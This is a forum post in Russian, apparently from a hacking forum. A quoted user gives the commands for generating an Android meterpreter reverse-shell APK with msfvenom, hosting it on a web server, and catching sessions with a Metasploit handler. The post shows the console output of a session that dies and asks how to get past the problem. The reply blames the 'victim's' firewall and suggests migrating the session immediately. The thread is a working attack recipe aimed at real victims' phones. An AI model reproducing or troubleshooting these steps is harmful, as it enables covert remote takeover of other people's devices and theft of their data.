
07.01.2017, 17:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
Провел на форуме: 238786
Репутация:
40
|
|
Сообщение от Fujiko Mine
Fujiko Mine said:
↑
в общем вроде делаю всё по сценарию:
ОС Kali 2
мой_ip=192.168.0.103
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.103 LPORT=8080 R > /var/www/shell.apk
msfconsole
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.0.103
set lport 8080
exploit
собственно потом вижу это:[*] Started reverse TCP handler on 192.168.0.103:8080[*] Starting the payload handler...[*] Sending stage (63194 bytes) to 192.168.0.100[*] Meterpreter session 1 opened (192.168.0.103:8080 -> 192.168.0.100:54636) at 2017-01-04 15:46:03 +0000[*] 192.168.0.100 - Meterpreter session 1 closed. Reason: Died
[-] Invalid session identifier: 1
интересны возможные причины и способы их обойти/устранить
у жертвы фаерволл 1) пробуй сразу мигрейт сделать 2)
|
|
|